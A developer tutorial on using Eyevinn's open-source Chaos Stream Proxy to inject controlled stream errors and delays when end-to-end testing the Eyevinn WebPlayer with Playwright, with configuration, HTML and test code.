Testing the behavior of a video player when there is something wrong with the video source used to be a tedious task: You had to either manually create or hunt down different broken streams to test different errors, and even then you couldn't always know for sure that the same error would always occur with the same timing. To address this problem, Eyevinn has released its Chaos Stream Proxy as open-source! As the name suggests, this is a very handy tool for proxying an adaptive bitrate stream and deterministically introducing corruptions to it. This tutorial will demonstrate how to use the Proxy in the end-to-end testing of the open-source Eyevinn WebPlayer, using Playwright. Using the Chaos Stream Proxy A demo of the Chaos Stream Proxy, which we'll use for the purpose of this tutorial, is currently running here. The Proxy supports both HLS and MPEG-DASH streaming formats, and easily lets us add different corruptions by adding a stringified JSON object as a query parameter to the proxied URL. If we take this HLS URL: it can be played with no problems, for example in the Eyevinn WebPlayer, hosted here. But, if we proxy it through the Chaos Stream Proxy, and set &statusCode=[{i:*,code:404}]:[{i:*,code:404}] we'll instead get 404 errors for all segments (because we set i:*; it's also possible to specify individual segments). For specifying other types of corruptions, check out the project's README. EPAS and the Eyevinn WebPlayer The Eyevinn WebPlayer implements Eyevinn Player Analytics Specification (EPAS), which is an open specification that defines a standard for implementing analytics in any video/audio player. This means that we have a format for event reporting that we expect the WebPlayer to follow. User interactions are easy enough to create for the sake of validating the EPAS implementation, and thanks to the Chaos Stream Proxy, manifest related errors are now also a piece of cake! Setting up Playwright Playwright is a powerful end-to-end test runner, which we're using to automatically test our code in a real browser environment. At the time of writing, we're adding a dependency for "@playwright/test": "^1.19.2" in our package.json(this is a Node.js project). We also add the script "test:e2e": "playwright test". Our playwright.config.ts is in the project root, and looks like this: import { PlaywrightTestConfig, devices } from '@playwright/test'; const config: PlaywrightTestConfig = { forbidOnly: !!process.env.CI, retries: process.env.CI ? 2 : 0, testDir: "tests/", workers: 3, use: { trace: 'on-first-retry', // Necessary to get the media codecs to play video (default 'chromium' doesn't have them) channel: 'chrome' }, webServer: { command: 'npm run examples', port: 1234, reuseExistingServer: !process.env.CI, }, projects: [ { name: 'chromium', use: { ...devices['Desktop Chrome'] }, }, ], }; export default config; testDir points to the folder where we put our test .spec.ts files; examples in the npm run examples command is a folder in our root directory, in which we put the HTML files that Playwright will use. Note that channel: 'chrome' is necessary for our tests to run; the default setting is chromium, which doesn't include the necessary media codecs for video playback . This may cause issues with automated workflows and running tests on Firefox and Webkit, but works locally in Chrome. In our examples folder, we add an index.html HTML file that includes a link to our Chaos Stream Proxy HTML: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http- <title>Examples</title> </head> <body> <a href="chaos-proxy/index.html">Chaos Stream Proxy Example</a> </html> As well as the Chaos Stream Proxy HTML index.html file in the sub-folder chaos-proxy: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http- <title>Chaos Stream Proxy Example</title> <script async</script> </head> <body> <!-- VOD: With segment delay of 1500ms and response code 400 on sixth (response of 400 will be sent after 1500ms): --> <eyevinn-video source="[{i:5,ms:1500}]&statusCode=[{i:5,code:400}]" muted autoplay> </eyevinn-video> <!-- VOD: With response of status code 404 on all segments: --> <eyevinn-video source="[{i:*,code:404}]" muted autoplay> </eyevinn-video> </body> </html> This file imports the compiled version of Eyevinn WebPlayer Component from the repository, which let's us embed the WebPlayer as web components with the <eyevinn-video> tags. In our tests folder, we add chaos-proxy.specs.ts, which will be run automatically when we run the npm run test:e2e script: import { test } from '@playwright/test'; test('player sends error events when loading corrupt streams', async ({page}) => { const [request] = await Promise.all([ page.goto('/chaos-proxy/index.html'), page.waitForRequest(req => req.url().match('') && req.method() === 'POST' && req.postDataJSON().event === "warning" && req.postDataJSON().payload.code === "400"), page.waitForRequest(req => req.url().match('') && req.method() === 'POST' && req.postDataJSON().event === "warning" && req.postDataJSON().payload.code === "404"), ]); }); We make asynchronous calls to the goto and waitForRequest methods, available on the pageobject. We check that the POST requests conform to the expected format: If both matching requests are made within 30 seconds, the test passes! We run the test with npm run test:e2e, and this should be the result: Success! Bonus: Playwright Test for VSCode and debug mode Playwright is developed my Microsoft, so perhaps it shouldn't come as a surprise that there is an excellent VS Code extension available. With this extension, it's a breeze to run individual tests in isolation, add breakpoints and more! It also gives easy access to debug mode, which lets us view and interact with the test in the test runner browser: Discussion (0)
https://dev.to/video/end-to-end-testing-with-our-chaos-stream-proxy-45cc
CC-MAIN-2022-27
refinedweb
936
53.41
To illustrate this, let's use the below code, through typeid operator to determine the data type at runtime, a C++ mechanism called Real-time Type Information (RTTI). #include <iostream> #include <typeinfo> using namespace std; int main() { unsigned int x = 10; unsigned y = 20; cout << typeid(x).name() << endl; cout << typeid(y).name() << endl; } Compile and run the code. Observe that the output shows two js? Because in GCC, the return name is a decorated name (which have been mangled) and we need to demangle it. $ g++ typeid.cc -o typeid $ ./typeid j j To demangle the name, use the c++filt program, result as shown below. Now the question here is why the function name was mangled? As C++ supports function overloading, a feature where you can define two or more functions/methods with the same name but different function parameters. Conversion to the assembly code needs unique assembler name for these functions. This is where the process of mangling comes in. The c++filt tool reverses the process to find the exact name. $ ./typeid | c++filt -t unsigned int unsigned int Lots of new things learned here but most importantly, always double check (google in this sense) for any assumed knowledge before you shared with someone else.
https://www.kianmeng.org/2016/11/c-differences-between-unsigned-and.html
CC-MAIN-2018-17
refinedweb
209
65.62
I’m working on a project at the moment where I need to be able to poll an API periodically and I’m building the application using React. I hadn’t had a chance to play with React Hooks yet so I took this as an opportunity to learn a bit about them and see how to solve something that I would normally have done with class-based components and state, but do it with Hooks. When I was getting started I kept hitting problems as either the Hook wasn’t updating state, or it was being overly aggressive in setting up timers, to the point where I’d have dozens running at the same time. After doing some research I came across a post by Dan Abramov on how to implement a Hook to work with setInterval. Dan does a great job of explaining the approach that needs to be taken and the reasons for particular approaches, so go ahead and read it before continuing on in my post as I won’t do it justice. Initially, I started using this Hook from Dan as it did what I needed to do, unfortunately, I found that the API I was hitting had an inconsistence in response time, which resulted in an explosion of concurrent requests, and I was thrashing the server, not a good idea! But this was to be expected using setInterval, it doesn’t wait until the last response is completed before starting another interval timer. Instead I should be using setTimeout in a recursive way, like so: const callback = () => { console.log("I was called!"); setTimeout(callback, 1000); }; callback(); In this example the console is written to approximately once every second, but if for some reason it took longer than basically instantly to write to the console (say, you had a breakpoint) a new timer isn’t started, meaning there’ll only ever be one pending invocation. This is a much better way to do polling than using setInterval. Implementing Recursive setTimeout with React Hooks With React I’ve created a custom hook like Dan’s useInterval: import React, { useEffect, useRef } from "react"; function useRecursiveTimeout<T>( callback: () => Promise<T> | (() => void), delay: number | null ) { const savedCallback = useRef(callback); // Remember the latest callback. useEffect(() => { savedCallback.current = callback; }, [callback]); // Set up the timeout loop. useEffect(() => { let id: NodeJS.Timeout; function tick() { const ret = savedCallback.current(); if (ret instanceof Promise) { ret.then(() => { if (delay !== null) { id = setTimeout(tick, delay); } }); } else { if (delay !== null) { id = setTimeout(tick, delay); } } } if (delay !== null) { id = setTimeout(tick, delay); return () => id && clearTimeout(id); } }, [delay]); } export default useRecursiveTimeout; The way this works is that the tick function will invoke the callback provided (which is the function to recursively call) and then schedule it with setTimeout. Once the callback completes the return value is checked to see if it is a Promise, and if it is, wait for the Promise to complete before scheduling the next iteration, otherwise it’ll schedule it. This means that it can be used in both a synchronous and asynchronous manner: useRecursiveTimeout(() => { console.log("I was called recusively, and synchronously"); }, 1000); useRecursiveTimeout(async () => { await fetch(""); console.log("Fetch called!"); }, 1000); Here’s a demo: Conclusion Hooks are pretty cool but it can be a bit trickier to integrate them with some APIs in JavaScript, such as working with timers. Hopefully this example with setTimeout is useful for you, feel free to copy the code or put it on npm yourself.
https://www.aaron-powell.com/posts/2019-09-23-recursive-settimeout-with-react-hooks/
CC-MAIN-2019-43
refinedweb
577
57.81
A few days ago I compiled Inkscape from source, and it seemed to work just fine (even better than the standard install here on my Arch Linux system, for some reason it starts up much faster now!). However, I just noticed that some extensions using "inkex.py" have a problem, namely Code: Select all Traceback (most recent call last): File "rtree.py", line 19, in <module> import inkex, simplestyle, pturtle, random File "/usr/local/share/inkscape/extensions/inkex.py", line 57 u'sodipodi' :u'', ^ SyntaxError: invalid syntax I'm not entirely sure whether this is the right sub-forum to post this -- but what's causing this? Did I forget to satisfy certain dependencies, should I have somehow changed the configuration file before compiling, did I overlook something...? Thanks!
http://www.inkscapeforum.com/viewtopic.php?f=5&t=12457
CC-MAIN-2016-40
refinedweb
129
60.14